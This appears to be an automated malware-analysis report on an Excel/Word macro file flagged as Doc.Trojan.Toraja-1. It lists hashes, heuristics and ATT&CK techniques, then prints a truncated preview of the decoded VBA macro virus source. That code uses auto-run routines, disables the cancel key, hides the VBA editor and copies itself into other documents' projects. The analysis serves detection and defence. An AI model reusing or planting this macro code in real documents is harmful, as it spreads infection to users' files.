Doc.Trojan.Toraja-1 Office (OLE) malware analysis — malicious · f492dfc29f406901

MALICIOUS

Office (OLE)

54.0 KB Created: 2001-05-02 19:34:33 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: d840620cf32d6c741e9fbfd632d3b741 SHA-1: 312d5dbb1847cc710e4c0c842a5798e5c663ef9c SHA-256: f492dfc29f406901863ad502bd91f6d7d08d07d0b0fe3c3a4d376a6a333965cd

300 Risk Score

Malware Insights

Doc.Trojan.Toraja-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Toraja-1. High-severity heuristics indicate the presence of VBA macros, specifically an AutoOpen macro that utilizes CreateObject to execute code. The VBA script itself is heavily obfuscated but appears to be designed to download and execute a secondary payload, as suggested by the 'Toraja12' module and the presence of auto-execution routines.

Heuristics 6

ClamAV: Doc.Trojan.Toraja-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Toraja-1
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	51297 bytes
SHA-256: `87f1f7f9878c4a5df4845cfcb8ee9659dff5c20cefe57e377ef17128afb6d4b8`
Detection ClamAV: Doc.Trojan.Toraja-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_BeforePrint(Cancel As Boolean) On Error Resume Next If PrintOke = False Then Serang Cancel = True End If End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Toraja12" 'Created : Toraja High Land 1998 by Marsel - Lina 'Modified : July 1999 '-------------------------------------------------------------- Option Explicit Option Compare Text Dim Komp As Variant Public Const regApp As String = "Application" Public Const regSecSet As String = "Settings" Public Const regSecApp As String = "AppName" Const TempVer As String = "Tana" Const MacName As String = "Toraja" Const Ver As String = "12" Dim ctl As Variant Global blnFound As Boolean Dim CusProp Dim blnMod As Boolean Public Const TimerOn = "01:00:00" Const Akhir = 80 Dim Caption As String Dim actWindow Global Active Global Temp Global TempPath Dim Waktu Dim Bar As Integer Sub Register() On Error Resume Next If GetSetting(regApp, regSecSet, "FirstRun") = "" Then SaveSetting regApp, regSecSet, "FirstRun", Format(Date + 30, "dd-mm-yyyy") If GetSetting(regApp, regSecSet, "Version") <> Ver Then SaveSetting regApp, regSecSet, "Version", Ver If GetSetting(regApp, regSecSet, "UserKeyWord") <> MacName & Ver Then SaveSetting regApp, regSecSet, "UserKeyWord", "" If GetSetting(regApp, regSecSet, "AuthorKeyWord") <> "Marsel" Then SaveSetting regApp, regSecSet, "AuthorKeyWord", "" End Sub Function Serang() As Boolean Dim getDate As Date On Error Resume Next getDate = GetSetting(regApp, regSecSet, "FirstRun") If getDate <= Date Then ShowMe End Function Sub AutoExec() Application.EnableCancelKey = 0 Application.DisplayRecentFiles = False SaveSetting regApp, regSecApp, "Microsoft Word", "True" MenuWord ExportXls Register Documents.Add Application.OnTime Now + TimeValue(TimerOn), "OnTimer" End Sub Sub AutoNew() On Error Resume Next TempActive ActiveWindow.View.Type = 3 End Sub Sub AutoOpen() On Error Resume Next Dim strRun As String Application.EnableCancelKey = 0 If PWords = False Then Application.ShowVisualBasicEditor = False ActiveTemp RemoveAll MenuWord Register If blnFound = True Then strRun = TempVer & Ver & "." & MacName & Ver & ".FoundIt" Application.OnTime Now + TimeValue("00:01:00"), strRun End If End Sub Function KeyWord() As Boolean If GetSetting(regApp, regSecSet, "UserKeyWord") = MacName & Ver Then KeyWord = True End Function Sub FileOpen() On Error Resume Next WordBasic.DisableAutoMacros 1 Dialogs(80).Show TempActive WordBasic.DisableAutoMacros 0 End Sub Function KompProject(Asal, Tujuan) As Boolean On Error GoTo Salah blnMod = False For Each Komp In Tujuan.VBProject.VBComponents If Komp.Name = MacName & Ver Then blnMod = True If (Komp.Name <> "ThisDocument") And (Komp.Name <> "Reference To Normal") And (Komp.Name <> MacName & Ver) And _ (Left(Komp.Name ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.